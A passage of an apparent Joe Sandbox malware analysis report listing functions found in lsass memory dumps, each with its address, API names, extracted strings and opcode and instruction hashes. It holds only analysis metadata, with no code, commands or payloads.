                                                                      • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction Fuzzy Hash: 1E31E521312622D3FE91DB8FE60875622A4B74EFA0F6905259D2E07398EF39D09DC302
                                                                      Function 000002A2919A3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction ID: 23f971f6aa6706c2256635c771a537c12f52c91efb7c1af5dc6ceecc5ee62274
                                                                      • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction Fuzzy Hash: AB118E31310AA1C7F7908B1BF94831A66A0F38EFE4F644225EA2A877D4CF38C90C8741
                                                                      Function 000002A291993790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID: wr
                                                                      • API String ID: 1092925422-2678910430
                                                                      • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction ID: 78aa278ec88c86537f2b5306803016608d9432e31d0b705b3b66faa2d80037fb
                                                                      • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction Fuzzy Hash: 3B115A2A304762C3FB949B2BE50826A62B0F74AF84F650028DE9907798EF2DC64DC705
                                                                      Function 000002A291995B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction ID: 8e6775f4180294222f22188b8baa7f2f2ca9f794fb603b8fb577a7d6741249f2
                                                                      • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction Fuzzy Hash: FCD19C36205B99C2FAB09B1AE59435B77A0F38DF88F204116EA8D47B69DF3CC559CB01
                                                                      Function 000002A291992F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: dialer
                                                                      • API String ID: 756756679-3528709123
                                                                      • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction ID: d9b6e3f3fbde7c1d9873550896ce399894800054be0f13c2b67ef489ea9a009b
                                                                      • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction Fuzzy Hash: 7B319D22701B66C3FA94DF2BE64876B67A0FB4AF84F1840209E4847B59EF34D4AD8301
                                                                      Function 000002A29199CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction ID: 4a7941c75334ec3185a8439fab1463888cffeda500893dbf40a9a79e8ddde821
                                                                      • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction Fuzzy Hash: BD114F21341666C7FAE4573BE78D33B61925B5FFE4F3407249836476DEDE28840D8202
                                                                      Function 000002A29199199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction ID: 5a5af4342115806afc14c761473f91ccf1938b95f9de70327975ecfe1b508ef4
                                                                      • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction Fuzzy Hash: B4013521300A62C2FA949B5BA94835A63A1F78DFC4FA84035DE5A43798DE3CC98EC701
                                                                      Function 000002A2919936C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction ID: 947c7fa1ad3ec27a09c19561f460c0d926b82a7c4141b4461b8e4805c66bb5eb
                                                                      • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction Fuzzy Hash: FD010965711762C7FBA49B2BE90C31B62B0BB4EF86F640428C95906794EF3DC14C8702
                                                                      Function 000002A291998FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                      • Instruction ID: e4074c3d989006062b1011126d9b052f5ce7c95440880c57faee1aa528616484
                                                                      • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                      • Instruction Fuzzy Hash: 25517E72701622CBFBA48B1EE94CB5A2795F34AF88F648528DA564778CDF35C84DC702
                                                                      Function 000002A291993044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction ID: 05c4583ffae46600bed06886ddadac808394b260982dfb2ad06563bfe6178556
                                                                      • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction Fuzzy Hash: E4F05E20704BA2C3FA808F2BBA0C11A6260AB4EFC0F648120EE5607B58DE28C54E8701
                                                                      Function 000002A29199BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction ID: 532e30cbf3ed3c0db960dda60228f1adcd0baa93d67c2350fa8149c1815f2972
                                                                      • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction Fuzzy Hash: 52F06261311A26C3FB548B2EE54D75B6320EB8FF61FA40219CA6B451E4DF2DC44DC302
                                                                      Function 000002A2919950D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction ID: a784433245ebc767c323d0d19b128198bb02bfc69fc0680bcae65617792c778e
                                                                      • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction Fuzzy Hash: 6A02BC32219B95C7F7A0CB5AF55435BB7A0F389B94F204016EA8E87B69DF78C458CB01
                                                                      Function 000002A291995710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction ID: 6946616450a21ddfee37c7bd35f5e43c0242158b3216ae6897bbf5740372dcf2
                                                                      • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction Fuzzy Hash: D861AE76619A55C7F6A08B1AF54831B77A0F389B44F600116EA8E4BBA8DF7CC55CCF02
                                                                      Function 000002A2911D3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 10a7772116927c9e5d22d35f01076c4d3e78c743838986f952f5529fbe920956
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: AB1186FA730A33F3FAD4151FE44D36711806F5AB74EE84629A966062D6CF28C44D4102
                                                                      Function 000002A2919A4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 53c64429bb941cceb4271d550a9b971859a65673c9f7bb57f83dceafb3562638
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 3011C122B10A73D3F6E6556EE65D36711807B7FBB8F3C0A24A976076D6CE24D84C8203
                                                                      Function 000002A2911CF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                      • API String ID: 3215553584-4202648911
                                                                      • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction ID: 1bbfd92db6e95b8fc9539b16fb8632b4a2ed3b6d0598b1e6c73ff1e62b443b6d
                                                                      • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction Fuzzy Hash: A8618F36700663E3FAE59A6FE54C32B6AA2E783F40F754415CA0A037A4DF34C94DA203
                                                                      Function 000002A29199AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: a73d1f298939c95b8273a44cc4430b5fd8c3e8e17c0158018733cb94f3254e73
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 50617636B01A95CBFB609F6AD68439E77A1F349B88F244215EE4917B98DF38D488C701
                                                                      Function 000002A2911CA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: ae080d31f9a23d4b48301dcc4bdb2464afb26e9ddb5bb71d6685049e8a2a6eb7
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 5C51D0323042A2DBEBB18B5BA45835E77A0F356F84F285116DA8987BC5DF78C45CE702
                                                                      Function 000002A29199AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: 83ea0d018fee459cfa53da402ecaf07e370cce6283bd230a5add074b43673c95
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: BF519F7A2002A2CBFBA48B1BD68835A77A0F35AF95F244115DA5947BD9CF38D45CC702
                                                                      Function 000002A2911C8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: 926694b6d52d54cb27d4976bf5ac45df6aaa9f61c1e787702c5ad3038b920f7b
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: 7851E632711622E7DB94CB1AD488B2A3395F362F98F718126DA064374CEFB4D84DDB05
                                                                      Function 000002A2911C83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: 2aefe856cf9821ae54ee426a3807d8c36b3e988bff2276817065e4b5fdfe7aae
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: 7631B031301661E7E794DF1AE88875A77A4F752F88F258019EE4A03748DF38C94DD706
                                                                      Function 000002A2919A2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction ID: 307230fd63942bdd5a78379f5f9f12523036320d15212c8f65d9e8de9dc1814f
                                                                      • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction Fuzzy Hash: AFD1DD32704A91CAF751CB6AD6482AD3BB1F34AB98F244216CE5997BD9DE34C40EC341
                                                                      Function 000002A2919914A4 Relevance: 6.3, APIs: 5, Instructions: 38memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction ID: 35b72c5b87daf49ec089226d9ca65f2f0c7e377a4a9afe8c702c47c3c1fe457c
                                                                      • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction Fuzzy Hash: 9E018C36700AA1C7E784DF6BEA0814A6BA0F78EF85F644024EA5A43759DE38E05CC741
                                                                      Function 000002A2919A2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
                                                                      • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction ID: 3ddf5e4ff360607ae1ad631fdafb66c63b2c3da85c3dd6b57fe440fffbc7acd3
                                                                      • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction Fuzzy Hash: 4E918472710661C7F7A09F6E97583AE2BA0B74AF88F744109DE0657AD5DE34C48EC702
                                                                      Function 000002A291997960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction ID: 2d278db7f6185bf4257e8498063ddb4dbc240bb3c3e343283c291c85a2a909c7
                                                                      • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction Fuzzy Hash: F3117022710F12CAFB40CF65E8583A933A4F31EB58F540E25EA6D427A4DF78D1AC8380
                                                                      Function 000002A2911C9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 6f07e790c581b63989c5fc7a634458588c2cb7c78a0069fc75f04618ec94c229
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 0B617933600B99DAEB60DF6AD08439E77A0F346B88F244215EF4917B98DF38D099D702
                                                                      Function 000002A291992330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction ID: 71adc9c5821356b1c1c63586a9e8c75c0363f9b6de45721788ff6ca54b5d8a1b
                                                                      • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction Fuzzy Hash: A451A1227043A2C2F6A89A2FE25C3AB5761F38EF40F640125DD5A03B4EDE39C94C8742
                                                                      Function 000002A2919A26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction ID: 7629f06d96b79a272e6f04d7db8bc3803aa5b6164494ce0c6112b717000e5649
                                                                      • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction Fuzzy Hash: EC41A232315A91C2EBA08F2AE6483AA77A0F79DB94F644021EE4D87798DF3CC54DC741
                                                                      Function 000002A2919994A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
